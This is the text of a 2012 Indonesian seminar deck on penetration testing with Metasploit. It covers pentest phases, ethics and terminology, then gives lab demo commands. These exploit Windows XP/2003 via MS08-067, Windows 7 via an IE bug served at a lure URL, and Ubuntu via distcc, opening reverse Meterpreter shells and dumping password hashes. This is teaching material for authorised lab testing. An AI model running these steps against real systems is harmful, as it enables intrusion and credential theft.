Pentest with Metasploit

penetration testing with metasploit Presented by Syarif ‘ﬂ3xu5’ Seminar IT Security Safe The System Sumedang, April 29 2012 STMIK Sumedang

Agenda• Why & What’s Penetration Testing ( Pentest )• << back|track Overview• Metasploit Basics & Meterpreter• DEMO :)

Why Pentest ?• Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1)• Penetration Test is one of the most effective ways to identify weaknesses and deﬁciencies in these programs *1)

What’s Penetration Testing• A method to evaluate the security of computer system / network• Practice ( attacking ) an IT System like a ‘hacker’ does • Find security holes ( weaknesses ) • Bypass security mechanism • Compromise an organization’s IT system security Must have permission from IT system owner ! illegal activity put you in Jail

Ethics• Think before act• Don’t be stupid• Don’t be malicious

Pentest Phases Reporting Post Exploitation Exploitation Vulnerability Analysis Information Gathering

<< back|track overview• Let’s watch the video :)

<< back|track overview The Most Advanced Linux Security Distribution Real World Pentesting Tools•Developed for Security Professional . Open Source & Always be

<< back|track overview

What’s• Not just a tool, but an entire framework *1)• an Open source platform for writing security tools and exploits *2)• Easily build attack vectors to add its exploits, payloads, encoders,• Create and execute more advanced attack• Ruby based

Metasploit interfaces• MSFconsole• MSFcli• msfweb, msfgui ( discontinued )• Metasploit Pro, Metasploit Express• Armitage

MSFconsole

MSFcli

Metasploit Terminology• Exploit : code that allow a pentester take some advantages of a ﬂaw within system,application, or service *1)• Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1)• Shellcode : a set of instructions used as payload when exploitation occurs *1)• Module : a software that can be used by metasploit *1)• Listener : a component for waiting an incoming connection *1)

How does exploitation works 2 exploit run , then payload run 1 exploit + payload 3 Upload / Download data attacker vulnerable server

Traditional Pentest Vs MetasploitTraditional Pentest Metasploit for PentestPublic Exploit Gathering Load Metasploit Change offsets Choose the target OS Replace ShellCode Use exploit SET Payload Execute

Meterpreter• as a payload after vulnerability is exploited *1)• Improve the post exploitation

Meterpreter Exploiting a vulnerability meterpreter shellSelect a meterpreter as a payload

Meterpreter command

Pentest Scenario *attacker vulnerable OS on VMware * : Ubuntu 8.04 metasploitable

OS in the Lab• BackTrack 5 R 2 • IP address : 172.16.240.143• Windows Xp SP 2 • IP address : 172.16.240.129• Windows 2003 Server • IP address : 172.16.240.141• Windows 7 • IP address : 172.16.240.142• Ubuntu Linux 8.04 ( Metasploitable ) • IP address : 172.16.240.144

Windows XP Exploitation• msf > search windows/smb• msf > info exploit/windows/smb/ms08_067_netapi• msf > use exploit/windows/smb/ms08_067_netapi• msf exploit(ms08_067_netapi) > show payloads• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp• msf exploit(ms08_067_netapi) > show options• msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129• msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143• msf exploit(ms08_067_netapi) > show options• msf exploit(ms08_067_netapi) > exploit• meterpreter > background• session -l

Windows XP Post Exploitation• session -i 1• meterpreter > getsystem -h• getuid• hashdump

Windows 2003 Server Exploitation• msf > search windows/smb• msf > info exploit/windows/smb/ms08_067_netapi• msf > use exploit/windows/smb/ms08_067_netapi• msf exploit(ms08_067_netapi) > show payloads• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp• msf exploit(ms08_067_netapi) > show options• msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129• msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143• msf exploit(ms08_067_netapi) > show options• msf exploit(ms08_067_netapi) > exploit• meterpreter > background• session -l

Windows 7 Exploitation • msf > use exploit/windows/browser/ms11_003_ie_css_import • msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms11_003_ie_css_import) > show options • msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143 • msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 • msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi • msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143 • msf exploit(ms11_003_ie_css_import) > set LPORT 443 • msf exploit(ms11_003_ie_css_import) > exploit •Just wait until the victim open the url http://172.16.240.143:80/miyabi-naked.avi

Windows 7 Exploitation• msf exploit(ms11_003_ie_css_import) > sessions -l• msf exploit(ms11_003_ie_css_import) > sessions -i 1• meterpreter > sysinfo• meterpreter > shell

Ubuntu 8.04 Metasploitable Exploitation• search distcc• use exploit/unix/misc/distcc_exec• show payloads• set PAYLOAD cmd/unix/reverse• show options• set rhost 172.16.240.144• set lhost 172.16.240.143• exploit

Any Question ? Contact me• website : http://fl3x.us• Official BackTrack Indonesia Community : http://indobacktrack.or.id• Email : fl3xu5@indobacktrack.or.id• twitter : @fl3xu5

Thanks to• BackTrack Linux• Metasploit Team ( HD Moore & rapid7 )• Offensive Security / Metasploit Unleashed• David Kennedy• Georgia Weidman

References• 1. Metasploit The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni• 2. http://www.metasploit.com• 3. http://www.offensive-security.com/metasploit- unleashed/Main_Page• 4. http://www.pentest-standard.org/index.php/ PTES_Technical_Guidelines

http://fl3x.us	8310
http://webcache.googleusercontent.com	9
http://translate.googleusercontent.com	5

Pentest with Metasploit

by Rif 'fl3xu5' on May 02, 2012

Accessibility

Categories

Upload Details

Usage Rights

3 Embeds 8,324

Statistics

Pentest with Metasploit Presentation Transcript